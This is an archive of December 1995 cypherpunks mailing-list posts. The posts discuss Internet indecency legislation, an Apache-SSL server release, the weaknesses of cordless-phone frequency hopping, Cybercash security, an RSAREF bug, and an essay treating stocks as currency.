Date: Wed, 27 Dec 1995 14:10:40 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: anonther anonymous poster
In-Reply-To: <9512260044.AA14158@all.net>
Message-ID: <30df67d24001002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Fred Cohen said:
> 
> 
> Another anonymous poster tells the cypherpunks to abandon liberty by
> abusing it.  When will the cypherpunks learn stand up to these people.
> 

This is really noise, but I just had a Woody flashback...
All that he'd have to do is change the second sentance to
"When will the cypherpunks learn to evaluate data."

Anyhow, Merry Christmas :)


-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Wed, 27 Dec 1995 01:17:05 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Assault presses with cop killer computers.
In-Reply-To: <199512260507.VAA09404@blob.best.net>
Message-ID: <30df89c1456a002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, James A. Donald said:
> 
> While channel surfing around 6PM today on Christmas day, I saw 
> President Clinton announce the grave international threat 
> posed by terrorists, drug dealers and money launderers wielding 
> computers (Only three horsemen -- he left out child pornographers.)

Probably because child pornographers have been dealt with in
the recent bill signed by Bill, which mandates 24-30 months
for transmitting child porn, double if a computer is used.
> 
> He was immediately followed by an Expert In Television Expertise, 
> who told us that computers were getting more and more powerful, and 
> doing more and more things, and that Something Must Be Done.

I'll have to keep an eye on my machine, I think it may be subversive.
Remember, computers don't break laws, people do...

> The Expert did not actually use the phrase "The first Amendment was never 
> intended to protect modern assault presses using cop killer computers", 
> but that was the message.
> 

I'll have to rename my machine black-rhino :)

-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 27 Dec 1995 11:09:23 +0800
To: cypherpunks@toad.com
Subject: Re: HRB Systems Data Storage Encryptor
Message-ID: <199512261539.HAA04685@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 AM 12/26/95 +0100, Anonymous wrote:
>Check out http://www.hrb.com/encryption/ssp.html, your
>exclusive source of the Ultron Crypto-Engine (tm)

The web page proudly announces:
  "is the only NSA-approved Type I data encryptor available today."

There are probably some people ignorant enough to regard that as
a recommendation.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 27 Dec 1995 05:30:18 +0800
To: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Subject: Re: Assault presses with cop killer computers.
Message-ID: <199512261249.HAA01723@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 25, 1995 23:36:00, 'Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>'
wrote: 
 
 
>According to rumor, James A. Donald said: 
>>  
>> While channel surfing around 6PM today on Christmas day, I saw  
>> President Clinton announce the grave international threat  
>> posed by terrorists, drug dealers and money launderers wielding  
>> computers (Only three horsemen -- he left out child pornographers.) 
> 
>Probably because child pornographers have been dealt with in 
>the recent bill signed by Bill, which mandates 24-30 months 
>for transmitting child porn, double if a computer is used. 
> 
 
see Reuters, "Clinton acts to tougher penalties" 23 Dec 95 08:40 
clari.news.crime.sex 
Message-ID: <Rclinton-pornographyURN-1_5DN@clari.net> 
 
see AP, "Clinton signs porn bill," 23 Dec 95 09:40 
clari.news.crime.sex 
Message-ID: <Aclinton-pornoURCBj_5DN@clari.net> 
 
What is most interesting is how far the four horsemen have rampaged and the
destruction they have already done. 
 
The internet is not the *least* regulated as those pushing for "tougher
penalties" claim. One can argue, using the new federal doubling of prison
terms when computers are used, that it is the *most* regulated. 
 
One can also see how far the combination of sexual hysteria and fear of new
technology has fed into and been used by politicians from throughout the
political spectrum. 
 
It also shows how much of the government threat to privacy is a social, not
a technological, issue. 
 
While people argue about heat-death-of-the-universe encryption algos, a
different form of hot air is producing the heat death of civil liberties. 
 
While cyber-libertarians talk about how strong crypto algos are needed to
protect property and how "the statists in Washington" are trying to take
away their crypto, right-wing pro-capitalist politicians have already taken
away civil liberties. 
 
While crypto-radicals talk about how strong crypto algos are needed to lead
the revolution and how "the nazis in Washington" are trying to take away
their crypto, sexual hysterics calling themselves "radical feminists" have
already helped take away many civil liberties. 
 
I support strong crypto. I support powerful and secure algos. I see it as a
wonderful development of technology to protect individual privacy. 
 
But privacy is only one right of the citizen; it is only one of the many
civil liberties under attack. 
 
I am also disturbed by the number of discussions on the list that may be on
topic but avoid *these* social issues, E.G. 
 
     Army vs. Navy Captain? 
     how cheap is AT&T? 
     Bizdos: confused executive vs. conspiratorial swine? 
     Are CFS programmers being treated nicely? 
     Fred Cohen: nice guy victim or swine? 
     Why Alice should use PGP. 
 
Ever heard of bit fiddlin' while Rome burns? 
 
--tallpaul 
      
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 27 Dec 1995 07:20:18 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
Message-ID: <v02140a02ad04b40c72a1@[165.254.158.223]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:33 12/25/95, tallpaul wrote:

>Thoughts? (I see one problem with this but it should be able to be worked
>out once the basic method is agreed to).

I assume that the "Problem" is that by only giving each corespondent ONE
E-Stamp, you are single streaming your connections with them (ie: Are
talking Half-Duplex). Not only are they restricted to one message
"in-flight" but they can not start another message until they have done a
capture run to acquire your ACK and get the new key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Wed, 27 Dec 1995 14:20:09 +0800
To: cypherpunks@toad.com
Subject: Mix Ported to DOS Yet?
Message-ID: <e26_9512260946@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please respond netmail, as I have but periodic contact w/list.]

Subject says it all:  Has anyone ported Mixmaster to DOS yet?  It has
been impending for about a year, it seems, but no one had actually done
it last time I asked.

Thanks for any new info...

        JE
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Dec 1995 04:11:49 +0800
To: cypherpunks@toad.com
Subject: Rawbutt Day
Message-ID: <199512261643.LAA28628@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Rasping rawbutts for National Whiners Day here's a duo 
   of pinhole puckers about the shut-your-filthy-hole bill:

----------

   The Wash Post, Dec 25, 1995:

   Internet Football

   The Internet provisions are still in flux along with the
   rest of the host telecommunications bill, in which this
   newspaper and its parent company have an interest. If these
   provisions go through in anything like their present form,
   then their vulnerability to challenge on First Amendment
   grounds seems clear. It makes sense for a court to sort out
   the constitutional from the technical aspects of this new
   form of "speech," and the sooner the better.

   It won't be easy. The main legal questions about the
   proposed Internet indecency regulations as they now stand
   are inextricably wound up with technical issues. Can the
   "transmitters" of material that is deemed "indecent" ensure
   to a reasonable degree of certainty that underage computer
   users cannot get to it? If they fail, how can they show
   they tried? Several ideas here are flags for trouble.

   No legally solid test exists for the "indecency" standard
   now in the regulations -- patterned on those used for
   earlier dial-a-porn legislation but addressing totally
   different technologies. The coalition of moderate conferees
   had tried to replace the term with the more explicit
   "harmful to minors" but failed by a single vote. The
   Justice Department said in a letter last week that a
   "harmful to minors" standard was more likely than
   "indecency" to pass scrutiny but that "an overly broad
   restriction would likely not withstand constitutional
   scrutiny regardless of the standard chosen."

   That brings up the meaning of "transmit." Who is
   responsible for "transmitting" a smutty text that, say, a
   high school student locates by using an ordinary commercial
   account to (1) find, download and install free software
   that searches the Web, (2) use that tool to find a
   pornographic bulletin board overseas, and (3) make a copy
   to store in his own computer?

   The regulations now would punish anyone who "uses any
   interactive computer service to display [indecent material]
   in a manner available to a person under 18 years of age."
   But the bulletin board overseas isn't subject to U.S. Iaw.
   Most likely it will be up to the commercial providers to
   demand ID for certain types of accounts -- or up to
   account-buying parents to limit the scope of their kids'
   accounts. Whether providers can actually wall off sectors
   of the electronic world without cooperation from the adults
   paying the bills has more to do with the available
   electronic gizmos than with the laws governing the world to
   which they give access.

   There is much complicated back-and-forth about whether
   providers such as America Online and Prodigy will be held
   responsible for the effectiveness of the measures they
   take. But only the courts can decide what truly works. A
   court muddled its way through the Prodigy case on this
   topic in New York State recently. It declined to modify its
   own judgment that the provider was more liable because it
   had tried to create a "PG bulletin board" than if it had
   not. Whether or not this stands, it's a measure of the
   disconnect that persists as this legislation stumbles
   toward final enaction.

----------

   The NY Times, Dec 26, 1995:

   Mr. Hollings Saves the Phone Bill

   House and Senate conferees seemed ready to negotiate a
   damaging telecommunications compromise until Senator Ernest
   Hollings of South Carolina, the chief Senate negotiator,
   altered that destiny last week. Wielding the threat of a
   filibuster and a deft legislative hand, he rescued the best
   parts of flawed House and Senate bills passed earlier,
   added some good new ideas and threw out most of the rot.

   His draft bill could spark innovation and set off
   consumer-friendly competition among television, cable and
   telephone companies. Its biggest flaw is a heavy-handed and
   probably unconstitutional effort to ban "indecent material"
   from the Internet.

   The original bills sought to break down barriers that keep
   media companies from entering each other's markets. But
   three mistakes were made. The bills would have deregulated
   cable rates before competition by other video companies
   could protect customers from price-gouging cable operators.
   Local phone companies would have been allowed to enter the
   long-distance market before they faced competition from
   cable or other companies. Worse still, the bills would have
   allowed broadcasters, cable operators, telephone companies
   and newspapers to merge too easily. That could expose
   consumers to a frightening concentration of information
   sources.

   Mr. Hollings, with the help of key Republicans like Senator
   Larry Pressler, fixed most of these flaws. His draft bill
   would hold up entry of local phone companies into
   long-distance service until the Federal Communications
   Commission says O.K. after giving weight to an antitrust
   review by the Justice Department. The bill leaves it up to
   the F.C.C. to set reasonable guidelines for mergers. It
   would put off deregulation of most cable rates for three
   years -- enough time for phone and satellite services to
   take on cable operators.

   The one serious error is a prohibition against transmission
   of allegedly indecent materials over the Internet -- the
   network of millions of on-line computer subscribers around
   the world. The indecency standard is probably
   unconstitutionally vague and restrictive. The standard is
   also unnecessary. The law already forbids sending obscene
   materials by computer. To protect children, parents can buy
   easy-to-use programs that block indecent materials from any
   source. The draft bill threatens to trigger further
   Government control of electronic communication -- which has
   blossomed so far precisely because Government has stayed on
   the sidelines. Fortunately, Republican leaders like Speaker
   Newt Gingrich are troubled by the indecency standard. There
   is a good opportunity to knock the provision out before
   Congress takes a vote.

   Some Republicans, miffed when Vice President Al Gore
   declared the draft an Administration victory, threatened to
   withhold support. But telecommunications, the heart of a
   high-tech economy, is too important for small-minded
   sparring. Congress should take up the draft bill, remove
   the indecency provision and put Mr. Holling's good deed
   into law.

----------

   [The coccyx of a 12-26-95 WSJ eunucher]:

   First Amendment advocates, who have criticized the bill
   because it cracks down on Internet indecency and sets up a
   rating system and show-blocking circuitry against TV
   violence, got one small gift: The bill contains a provision
   for an expedited legal review of the constitutionality of
   those provisions. On the other hand, it also sets up a new
   law allowing 10-year prison terms for anyone who, using
   interstate phone calls, mail or other means, "persuades,
   induces, entices, or coerces" a minor to engage in any
   illegal sexual act.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 27 Dec 1995 18:02:36 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE
Message-ID: <199512262112.NAA00652@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh 510-601-9777

COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE

Community ConneXion today announced Apache-SSL Commerce, a commercial
version of the Apache webserver with support for Netscape
Communication Corporation's Secure Sockets Layer, a standard for
encrypted communications over the Internet.

Community ConneXion's Apache-SSL package includes Apache v1.0.0,
extensions to Apache which enable the SSL protocol, additional
customizations to the webserver, and tools to aid in server and SSL
maintainence. The server supports virtual hosts and an extensible API
to allow for easy modifications to the behavior of the server. Apache
is currently the fastest growing HTTP server, looking set to become
the most used web server on the net in 1996.

Sameer Parekh, President of Community ConneXion, commented on their
release of the encrypting webserver, "We're very happy to make
available an affordable SSL server to the Internet community. For
security to work, it must be ubiquitous, which requires that
encrypting servers be affordable and widely deployed."

Apache-SSL is available for free to non-commercial users, and the
commercial use package, Apache-SSL Commerce, is available for
$495.00. Customers who own versions of other commercial encrypting
webservers can upgrade to Apache-SSL Commerce for $295.00.  In
addition to the right to use the server in commercial applications,
the commercial package includes support and free lifetime upgrades
from Community ConneXion.  Apache-SSL Commerce is not available
outside the United States, but Apache-SSL is available for free, both
commercially and non-commercially, outside the United States from Ben
Laurie, of A. L. Digital, Ltd.

The Apache-SSL Commerce webserver is the only commercial encrypting
webserver with source available. Ian Goldberg, graduate student at
U.C. Berkeley, well-known for his work on SSL security, commented on
the importance of available source, "The public release of source,
especially for security-critical sections of code, is vital for a
product in which the public must put its trust.  It's far better for
me to be able to check the software that's used, say, for accessing my
bank account via the Web, for security problems, than for me to be
forced to trust whatever company put out the product.  Companies will
soon find that releasing more information about the internals of their
products will lead not only to better products, but better
reputations, as well."

Portions developed by the Apache Group, taken with permission from the
Apache Server http://www.apache.org/.  This product includes software
developed by Ben Laurie for use in the Apache-SSL HTTP server project.
This product includes software developed by Eric Young
(eay@mincom.oz.au).

Information on Apache-SSL is available at
http://www.c2.org/apachessl/. Questions and inquiries regarding the
server should be sent to apachessl@c2.org.

Community ConneXion, founded in June of 1994, is the leading provider
of privacy on the Internet. They provide anonymous and pseudonymous
internet access and web pages in addition to powerful web service,
virtual hosts, and web design consultation. Information is available
from their web pages at http://www.c2.org/.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 28 Dec 1995 04:48:49 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512261823.NAA27668@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 26, 1995 08:37:30, '"Robert A. Rosenberg" <hal9001@panix.com>'
wrote: 
 
 
>At 14:33 12/25/95, tallpaul wrote: 
> 
>>Thoughts? (I see one problem with this but it should be able to be worked

>>out once the basic method is agreed to). 
> 
>I assume that the "Problem" is that by only giving each corespondent ONE 
>E-Stamp, you are single streaming your connections with them (ie: Are 
>talking Half-Duplex). Not only are they restricted to one message 
>"in-flight" but they can not start another message until they have done a 
>capture run to acquire your ACK and get the new key. 
> 
 
Actually, with e-mail the problem was an infinite loop of stamp exchanges.
E.G. both of us are finickians who only accept e-mail from known
associates. So they send me an e-message with the correct stamp. I send
them an acknowlegmenet with a new stamp, but ... they won't accept the
message from me unless I stamp it. So I stamp my return receipt. They get
the return receipt and have to send me a new stamp, using the stamp I just
sent them. I then ackowledge receipt from them, using the stamp they just
sent me, and it is turtles all the way down. 
 
The workaround would be to have a semi-psycho e-bot who hoarded stamps,
i.e. would accept stamps from anybody without treating an e-stamp as an
e-mail message to me. 
 
I hadn't picked up the problem you mentioned. Thanks for pointing it out. 
 
I supposed the fix would be to send family (so to speak) books of stamps so
they could send multiple messages when I was on vacation, my personal e-bot
was down, etc. Of course, then family could get conned out of their stamps
by smooth talking ad spammers. But this would, I think, be a rare
occurance. That is, I wasn't thinking of *absolute* security just "good
enough privacy." 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Wed, 27 Dec 1995 16:28:33 +0800
To: cypherpunks@toad.com
Subject: Re: FH radios
Message-ID: <199512262025.OAA09759@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery  writes:

>	There is also a newer technology called direct digital synthesis
>or DDS that works by accumulating phase (adding to the previous value) 

We use DDS in some of our Microwave equipment between sites.  


>
>	There is certainly little additional cost to building a
>trully secure digital cordless phone given the dense ASIC technology
>that is standard in this kind of product - but someone has to
>persuade the manufacturers that there is a real need and find a way
>to allow them to export the product.
>

I agree; but, if the information you are passing is truly that important
just use a landline phone.  Eliminate the possable "leak".
I'm not claiming that a landline phone is secure, but your cordless is
connected to it, so no matter how good your security is on the phone its no
longer secure once it leaves the base station and enters the landline.

Further encryption can be implemented but this requires equipment on both
ends.  Really aren't we trying to create the most secure methods of
information exchange with the least amount of cost?  I'm budget restricted
so PGP and the internet are more secure and cheaper for me than most other
means of comunication, so far. :)


                        Dr0id
                        

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Wed, 27 Dec 1995 20:59:19 +0800
To: WWW-BUYINFO@ALLEGRA.ATT.COM
Subject: Cybercash security
Message-ID: <9511268200.AA820017186@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     What are the major security risks of the Cybercash system?  
     I can't really find any, other than someone cracking the consumer's 
     Cybercash client s/w password and using the victim's account to order 
     something, or someone cracking RSA!.  The following features seem to 
     mitigate other risks...
     
     
     - The merchant never sees the credit card number
     
     - The Cybercash server does not store any credit card numbers (only 
     temporarily while it is waiting for an authorizatino for a specific 
     card purchase)
     
     - The consumer's credit card number is stored on his hard disk 
     encrypted w/DES
     
     - The consumer sends his credit card number across the Internet 
     encrypted w/DES and signed w/ 768-bit RSA
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Wed, 27 Dec 1995 21:15:33 +0800
To: otaku@comsat.hackvan.com>
Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery]  [Vaughan Pratt]
Message-ID: <m0tUjjD-0006F1C@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I forwarded a cypherpunks message to technomads, where it got a killer
response, so I'll bounce it back to Cypherpunks...

    Stig
    

- ------- start of forwarded message (RFC 934 encapsulation) -------
From: Vaughan Pratt <pratt@cs.stanford.edu>
To: technomads@UCSD.EDU
Subject: Re: Fwd: Re: FH radios [Dave Emery] 
Sender: pratt@cs.stanford.edu
Date: Tue, 26 Dec 1995 12:00:43 -0800
Message-Id: <199512262000.MAA23334@Coraki.Stanford.EDU>
In-reply-to: Your message of "Tue, 26 Dec 1995 07:07:00 PST."
             <m0tUayp-0006F0C@hackvan.com> 


>>> Thus in a frequency-hopping radio you can push the retuning (read RF
>>> phase-locked loop) technology to its limit and build transmitters and
>>> receivers around them. These typically hop in the order of 100 times a
>>> second. The adversary has to find the uncorrelated signal very quickly
>>> indeed *and* have PLL technology at least as good as yours to recover
>>> anything from it. Finding the signal generally means listening to all
>>> frequencies at once, requiring huge amounts of hardware parallelism and/or
>>> realtime computing power. Once you throw ten or so radios onto the same
>>> band, it's no longer any use looking for the strongest signal, making that
>>> approach useless.
>> 
>> This is nowhere near the limit of the technology.  15 years ago, I was
>> working on PLLs that would stabilize within a couple degrees of final
>> phase within 3.5 microseconds.  That permits you to do useful work at
>> 100,000 hops per second.
>> 
>	There is also a newer technology called direct digital synthesis
>or DDS that works by accumulating phase (adding to the previous value) 
>each tick of a high frequency clock in a register at a rate determined
>by the contents of another register (the value here sets the frequency)
>with the upper bits of the accumulated phase being used to address a
>sine/cosine lookup table rom which in turn feeds digital output values
>into a D/A converter.  The output of the D/A converter is a sampled 
>approximation of a sine or cosine wave at a frequency set by the
>increment register.  The sample rate is set by the high frequency clock
>rate.

This is all wishful thinking.  A 26-MHz wide channel such as 902-928MHz
has a channel capacity of 2*26 Mbs or 6.5 megabytes/sec.  So if someone
can tell *that* you are transmitting somewhere within that channel then
they simply record *everything* at that data rate in the entire
channel, your transmission and everyone else's, for the necessary
time.  A $600 3.5Gb Sequel drive can record a ten-minute transmission;
then the eavesdropper can use one Pentium or two dozen, budget
permitting, to extract your message from that data.  If all you are
doing is frequency hopping or spread spectrum, reconstruction is a very
undemanding algorithmic task, and one Pentium should be able to
reconstruct your signal the same day, two dozen the same hour.

>But to get back to the original point of this thread - while
>such techniques are possible (as is full hard encryption), it is my
>understanding that actual conusmer 900 mhz digital cordless phones
>that use frequency hopping use a very limited set of frequencies
>and a small set of fixed hopping patterns and don't hop very fast. 

Hopping speed is almost completely irrelevant to the computational
complexity of this problem.

>When the brand of cordless phones that most emphasizes security
>from eavesdropping in its point of sale advertising display is the one that
>uses open FM with simple speech inversion you know there is something
>wrong, particularly when the company that makes it is a pioneer in
>really secure digital speech over handheld radios (and a big governmeent
>contractor).

To put it mildly.

You can never overestimate the cost of decryption.  What looks
expensive enough today to decrypt can plummet by orders of magnitude on
alarmingly short notice.  We used to think TCP was mildly secure until
easily installed sniffers became freely available on the internet that
would reconstruct a telnet connection and print out the first 100
characters, making it child's play to extract passwords.

If you think that you are secure because the effort of an attack seems
on the high side, bear in mind that the tasks in a systematic attack can
by definition of "systematic" be programmed, greatly easing the
attacker's task.  And once programmed, the program can be distributed to
all and sundry on the internet.

If a given level of cryptographic strength seems adequate for a message,
add several orders of magnitude and maybe you'll be lucky.  

I know of only two really satisfactory places to hide information worth
hiding: combinatorial search space (read: real encryption such as DES
or RSA, with a hefty key), and the real world, which as a search space
is approximately the size corresponding to a combinatorial space
encrypted with a 256-bit key (i.e. the world seems bigger than 128 bits
and smaller than 512).  The latter is distributed in space-time and
frequency (momentum-energy); if you consider only space-time or only
frequency the universe looks like only a 128-bit hiding place in either
case.  Both together give you 256 bits (very approximately, that's a
very round binary number).

Vaughan Pratt
- ------- end -------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMOCS5khaKuRiAqcVAQEJEAP/WNqKrjrGk5LpYt5fw70BtFYZEIMqkBzu
TQscTmoK2sSOeI9yjxmOp8aQhArLpOdN0ZQgfwkuelfV+/n73ms3hMV+JIDOvuFx
hirE1iBvZDMgEPX1BdyP94Me13a1f8mBKTTG1cPLIYKLSTZ1tmQ/MVI0EYN9H16U
AETV7FJilvM=
=l+fI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Dec 1995 00:41:34 +0800
To: cypherpunks@toad.com
Subject: fun with rsaref and 64-bit machines
Message-ID: <199512270120.RAA19559@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone know if RSAREF works on 64 bit CPUs? It seems
that RSAREF's NN_Mod is getting stuck in digit.c at:

99         */
100       while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {
101         if ((t[0] -= c) > (MAX_NN_DIGIT - c))
102           t[1]--;
103         aLow++;
104       }


	on a dec alpha..
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 01:57:52 +0800
To: cypherpunks@toad.com
Subject: a new idea: stocks == currency
Message-ID: <199512270222.SAA01737@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been mulling over recent essays on digital cash by diverse authors
that have popped up here and elsewhere and I'd like to highlight a 
revolutionary new "meme" of high cpunk relevance I see emerging, which 
I've not seen promoted by any single author yet (although I have seen
some prominent cpunks argue the opposite).

the basic thesis is as follows. digital cash obviously leads to an entirely
new economic system in which the nature of routine future transactions may be 
radically altered. one of the chief alterations discussed ad infinitum on
this list is the rise of economic freedom from taxation etc.   however
there is another interesting theme that is worth exploring at length that
is at least as significant as this (bugaboo) taxation issue.

one might look at the modern world and suggest that there is an increasing
unification of currencies. the EU (European Union) is an example of this
"trend". however I'm going to argue the opposite and suggest that the
trend is toward increasing diversity of currencies. I believe we are
moving toward a new system in which explosively more "currencies" will exist
than do today.

where will these come from? answer: stocks. I believe that future company
stock will be considered a kind of currency issued by the company. when
you are buying and selling stocks, what you are really doing is buying
and selling currencies backed by different corporate entities. 

I have seen EH argue here and elsewhere that only a government has the
legal capability of creating a currency. his view is that a currency is
backed through *liability* that is enforced through laws. this is an 
interesting statist-flavor argument coming from a radical libertarian.

what I would propose instead is that what a government has is *credibility*.
this is the old "reputation capital" issue discussed here frequently too.
a government is a massive entity larger than many companies that uses its
full legislative "force" to back its currency.   in another word,
*trust*.

however, I don't believe there is fundamentally a major difference 
between a company and a government, particularly in this area.
(go ahead, flame me to oblivion for saying this, but I believe it is 
actually a very libertarian argument.) the only difference is in size
and influence. it seems to me when a private company issues "cash", the
basic principle is the same. the person who uses this cash is *trusting*
the entity that issues it to back it with whatever they say they are
backing with it. to use my stocks == currency analogy, the stock or currency
of that company is backed by that company's assets and profitability.

the interesting theme behind this is that it unifies the entire economic
picture. suddenly the difference between currency and a stock tends to
blur when stocks

1. can be exchanged readily
2. there is no government intervention/regulation in the exchange
3. middleman ("stockbroker" etc.) costs are minimized
4. (other similar elements yet to be identified)

note that all these things appear to be the inevitable trend of uniting
an economic system with cyberspace.

--

my view of all this is somewhat blasphemous. the current system
says that we have to have a government entity called the SEC to ensure
that stocks are safe for those who invest in them. however, what I am
suggesting is that a free market can actually devise its own methods of
sorting out bogus from valid currency/stocks without government intervention.
in fact, in my opinion that's precisely what investment advice is. this
is exactly analogous too to the way that capital "naturally" moves away
from unstable currencies and economies (of course capital does not do it,
but the intelligent human forces that guide it amount to this basic effect).

hence what I am proposing is a sort of currency spectrum. stocks are
high risk but greater profit, and currency is low risk (stable) but
subject to inflation or loss of value. they are two ends on a 
currency spectrum. and what I am proposing is that in the future, this
currency spectrum will tend to emerge out of economic transactions in
cyberspace. 

this currency spectrum will be recognized as a basic function of
the cyberspatial economy. this economy will evolve overall to cut  out
middlemen and anything that decreases cash value. hence, you will see
things such as companies offering their own cash (stock) directly to 
"consumers" without the large overhead associated with today's stock market 
(which will be considered a rather backward way of running an economy in the
future because of the horrendous dissipation of capital involved in merely
moving it from place to place).

--

in the end, the government and various bankers lose their economic
monopoly on "creating" cash, which affords them no end to manipulative
capabilities. governments will compete with all other entities that desire
to create cash systems. cash will move where governments and entities most
"respect" it. oppressive tax laws etc. will be considered a lack of "respect" 
for cash.

I know that the opposite trend seems to be happening: an increasing clampdown
on "black cash". I think this may actually succeed in the short run, but
the eventual movement of the economy is toward unrestrained cash in the
same way there is a clear movement to an unrestrained cyberspace. there
may be "blips" or "disturbances" on the way, but they'd merely be anomalies.

my own view is that governments are either legitimately created or they
are not ("consent of the governed" etc.). 
if they are legitimately created and maintained, then people will continue to
support them even when it seems they have the choice not to (such as
evade taxes). if they are not supported, then they are not legitimate.
putting one's money where one's mouth is is the ultimate test of legitimacy
in our reality. that is, support of a government by its people is the
ultimate test of its legitimacy, and the the ultimate test of support
is *cash*transferred*. no amount of policemen thugs pointing machine
guns at tax protesters attempting to intimidate the entire population
will change this basic reality imho.

in fact I believe that many systems of today that are based on intimidation
are going to dissolve as cyberspace becomes more prevalent. the scientology
battle is a good example of this. before the internet their litigious
intimidation tactics may have succeeded (and arguably did). however the 
tactics are becoming increasingly discredited in my view. 

